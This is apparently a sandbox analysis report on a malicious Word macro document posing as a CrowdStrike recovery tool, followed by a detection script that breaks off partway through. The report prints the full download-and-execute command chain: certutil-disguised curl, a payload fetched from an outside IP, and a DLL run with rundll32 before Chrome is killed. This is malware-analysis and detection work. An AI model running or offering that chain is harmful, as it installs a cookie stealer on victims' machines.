Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: Templates.LNK.0.drLNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.drLNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.dr | Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.dr | Initial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr | Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.dr | Initial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.dr | Initial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.dr | Initial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0000.tmp.26.dr | Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: Element design set.dotx.0.dr | Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: VBA code instrumentation | OLE, VBA macro, High number of string operations: Module ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,
Source: mscorsvc.dll.14.dr | Static PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C4A381 push rdx; ret
Source: C:\Windows\SysWOW64\xcopy.exe | File created: C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\certutil.exe | File created: C:\Users\user\AppData\Local\Temp\mscorsvc.dll

Hooking and other Techniques for Hiding and Protection

Source: unknown | Network traffic detected: HTTP traffic on port 8099 (client ports 49195 and 49717; request and response directions both observed)
Source: unknown | Network traffic detected: HTTP traffic on port 5000 (client ports 49209–49212, 49214–49216, 49218–49232, 49234–49267, 49269–49324, 49327–49338, 49724–49726, 49785, 49787, 49788, 49791, 49792, 49796, 49799 and 49802–49814; request and response directions both observed, several connections carrying more than one response packet)
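The two sections above record a staging chain (xcopy.exe and certutil.exe writing curl.exe and mscorsvc.dll into the user's Temp directory, rundll32.exe running code whose PDB path is mscorsvc.pdb) and HTTP spoken on ports 5000 and 8099. The following is an added example of how a detection engineer would encode those observations as triage checks over endpoint telemetry; it is not Joe Sandbox code and not part of the report. The event records, their field names (`type`, `image`, `target`, `dst_port`, ...) and the choice of 80 and 8080 as "standard" HTTP ports are this example's own assumptions, and the rundll32.exe image-load event is inferred from the mscorsvc.pdb string found in rundll32.exe memory rather than recorded as such above.

```python
"""Triage checks for the staging chain recorded in the report (added example).

Encoded behaviours:
  1. A living-off-the-land binary (xcopy.exe, certutil.exe) writes a PE
     (.exe/.dll) under %LOCALAPPDATA%\\Temp.
  2. rundll32.exe loads a DLL from that same Temp directory.
  3. HTTP is carried on a port other than the usual web ports.
All event records below are constructed for this example; the field
names are this script's own and not a real EDR schema.
"""
import re
from typing import Iterable

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
PE_EXTENSIONS = (".exe", ".dll")
STAGER_BINARIES = {"xcopy.exe", "certutil.exe"}
STANDARD_HTTP_PORTS = {80, 8080}  # assumption: tune to the environment


def basename(path: str) -> str:
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def writes_pe_to_temp(event: dict) -> bool:
    """Stager LOLBin creating an executable or DLL under %TEMP%."""
    return (
        event["type"] == "file_create"
        and basename(event["image"]) in STAGER_BINARIES
        and event["target"].lower().endswith(PE_EXTENSIONS)
        and TEMP_DIR.search(event["target"]) is not None
    )


def rundll32_loads_temp_dll(event: dict) -> bool:
    """rundll32.exe mapping a DLL that lives in %TEMP%."""
    return (
        event["type"] == "image_load"
        and basename(event["image"]) == "rundll32.exe"
        and event["target"].lower().endswith(".dll")
        and TEMP_DIR.search(event["target"]) is not None
    )


def http_on_nonstandard_port(event: dict) -> bool:
    """HTTP identified by protocol parsing, but not on 80/8080."""
    return (
        event["type"] == "network"
        and event["protocol"] == "http"
        and event["dst_port"] not in STANDARD_HTTP_PORTS
    )


def triage(events: Iterable[dict]) -> list[str]:
    """Return one finding string per matching event, in input order."""
    findings = []
    for ev in events:
        if writes_pe_to_temp(ev):
            findings.append(f"lolbin-drop: {basename(ev['image'])} wrote {ev['target']}")
        elif rundll32_loads_temp_dll(ev):
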